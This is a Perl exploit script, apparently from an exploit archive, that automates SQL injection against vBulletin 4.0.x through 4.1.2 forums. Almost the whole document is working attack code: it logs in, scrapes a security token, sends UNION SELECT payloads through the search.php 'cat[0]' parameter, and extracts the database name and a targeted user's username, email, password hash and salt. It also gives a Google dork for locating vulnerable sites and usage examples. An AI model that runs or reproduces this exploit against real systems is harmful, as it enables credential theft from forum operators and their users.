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# vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit # Author: D35m0nd142, <d35m0nd142@gmail.com> # Google Dork: inurl:search.php?search_type=1 # Date: 02/09/2014 # Vendor Homepage: http://www.vbulletin.com/ # Tested on: vBulletin 4.1.2 # Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack> # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc # Vulnerability discovered by: D4rkB1t #!/usr/bin/env perl use LWP::UserAgent; use HTTP::Cookies; $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0"); $ua->cookie_jar({}); $username = "username) from user where userid=$ARGV[4]#"; $email = "email) from user where userid=$ARGV[4]#"; $password = "password) from user where userid=$ARGV[4]#"; $salt = "salt) from user where userid=$ARGV[4]#"; @tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt); sub request { $req = HTTP::Request->new(GET => $ARGV[0]); my $res1 = $ua->request($req); open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01); my $token = dumping("vbloginout.txt","token"); if($token eq '' || $token eq 'guest') { print "SECURITYTOKEN not found!\n"; $token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE print "Attempting using $token as token.\n"; } else { print "SECURITYTOKEN FOUND: $token\n"; } print "Sending exploit...\n\n"; sleep(1); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); break; } my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; print "Do you want to run the second exploitation way? (y/n) -> "; $want = <STDIN>; if($want =~ /y/) { second_request($token); } } sub second_request { my ($token) = @_ ; print "Attempting using the second exploitation way..\n\n"; sleep(2); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); exit(1); } my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; } sub banner { print "[-] Exploit not successful!\n"; if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303") { print "[i] Try to log in and log out from other any other sessions and run the exploit again.\n\n"; } } sub printout { my ($tofind) = @_ ; if($tofind =~ /username/) { print "[+] User($ARGV[4]) Username: "; } elsif($tofind =~ /password/) { print "[+] User($ARGV[4]) Password: "; } elsif($tofind =~ /database/) { print "[+] Database Name: "; } elsif($tofind =~ /email/) { print "[+] User($ARGV[4]) Email: "; } elsif($tofind =~ /salt/) { print "[+] User($ARGV[4]) Salt: "; } } sub dumping { my ($filename, $par) = @_ ; open(MYFILE,"< ", $filename); my @words; while(<MYFILE>) { chomp; @words = split(' '); if($par eq "token") { my $ctrl = "n"; foreach my $word (@words) { if($word =~ /SECURITYTOKEN/) { $ctrl = "y"; } if($ctrl eq "y" and $word !~ /=/ and $word !~ /SECURITYTOKEN/) { $word =~ tr/;//d; $word =~ tr/\"//d; return $word; break; } } } elsif($par eq "sql") { foreach my $word (@words) { if($word =~ /:::/) { $word =~ tr/::://d; print "$word"; } } } else { my $ctrl2 = "n"; foreach my $word (@words) { if($word =~ /Location:/) { $ctrl2 = "y"; } if($ctrl2 eq "y" and $word !~ /Location:/) { return $word; } } } } close(MYFILE); } sub login(@) { my $username = shift; my $password = shift; print "\nLogging in...\n"; sleep(1); my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf="); $ua->cookie_jar({}); my $res = $ua->request($req); request(); } if($ARGV[0] eq '' || $ARGV[1] eq '' || $ARGV[2] eq '' || $ARGV[3] eq '' || $ARGV[4] eq '') { print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n\n"; print "Usage: perl exploit.pl <<http://target> <valid username> <valid passwd> <existent group> <userid to hack>\n"; print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n"; exit(1); } print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n"; sleep(1); login($ARGV[1],$ARGV[2]); @files = ('vbloginout.txt','vbout.txt','vbloc.txt'); foreach $file (@files) { unlink $file; }